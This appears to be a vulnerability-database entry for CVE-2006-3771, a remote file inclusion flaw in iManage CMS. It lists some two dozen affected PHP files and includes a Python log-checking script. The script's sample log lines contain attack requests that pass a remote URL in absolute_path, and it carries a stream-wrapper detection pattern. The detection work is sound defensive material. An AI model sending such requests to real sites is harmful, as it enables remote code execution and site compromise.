CVE-2006-3771
iManage CMS < 4.0.12 - Remote File Inclusion via absolute_path Parameter
Title source: llm
Exploitation Summary
EIP tracks 1 public exploit for CVE-2006-3771. PoCs published by Matdhule.
AI-analyzed exploit summary
This exploit demonstrates a remote file inclusion vulnerability in iManage CMS <= 4.0.12 due to improper verification of the 'absolute_path' parameter. It allows arbitrary PHP code execution by including files from external resources.
Description
Multiple PHP remote file inclusion vulnerabilities in component.php in iManage CMS 4.0.12 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the absolute_path parameter to (1) articles.php, (2) contact.php, (3) displaypage.php, (4) faq.php, (5) mainbody.php, (6) news.php, (7) registration.php, (8) whosOnline.php, (9) components/com_calendar.php, (10) components/com_forum.php, (11) components/minibb/index.php, (12) components/minibb/bb_admin.php, (13) components/minibb/bb_plugins.php, (14) modules/mod_calendar.php, (15) modules/mod_browser_prefs.php, (16) modules/mod_counter.php, (17) modules/mod_online.php, (18) modules/mod_stats.php, (19) modules/mod_weather.php, (20) themes/bizz.php, (21) themes/default.php, (22) themes/simple.php, (23) themes/original.php, (24) themes/portal.php, (25) themes/purple.php, and other unspecified files.
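A log check for the request pattern described above, added here as an example and not part of the original entry or of iManage CMS: it flags access-log requests whose absolute_path value decodes to a URL or stream wrapper instead of a local path. The Apache-style log format, the sample lines and the host names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

PARAM = "absolute_path"  # parameter named in the CVE description
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A "scheme://" prefix (http, ftp, php, ...) or "data:" marks a stream wrapper
# rather than a local filesystem path.
WRAPPER_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*://|data:)', re.I)

def fully_decode(value, rounds=3):
    """Undo layered percent-encoding, stopping once the value is stable."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_lines):
    """Return (line_no, script_path, decoded_value) for each flagged request."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        # parse_qsl decodes once; fully_decode handles any further layers.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            decoded = fully_decode(value)
            if name == PARAM and WRAPPER_RE.match(decoded):
                hits.append((line_no, url.path, decoded))
    return hits

# Constructed sample access-log lines (not taken from any real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /articles.php?id=4 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /modules/mod_stats.php?absolute_path=http://files.example.invalid/a.txt HTTP/1.1" 200 312',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /themes/default.php?absolute_path=http%3A%2F%2Ffiles.example.invalid%2Fa.txt HTTP/1.1" 200 298',
    '192.0.2.77 - - [01/Jan/2024:10:01:00 +0000] "GET /news.php?absolute_path=/var/www/imanage/ HTTP/1.1" 200 4100',
]

if __name__ == "__main__":
    for line_no, path, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {line_no}: {path} {PARAM}={value!r}")
```

Access logs normally record only the query string, so a value sent in a POST body will not appear in this check.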
Exploits (1)
This exploit demonstrates a remote file inclusion vulnerability in iManage CMS <= 4.0.12 due to improper verification of the 'absolute_path' parameter. It allows arbitrary PHP code execution by including files from external resources.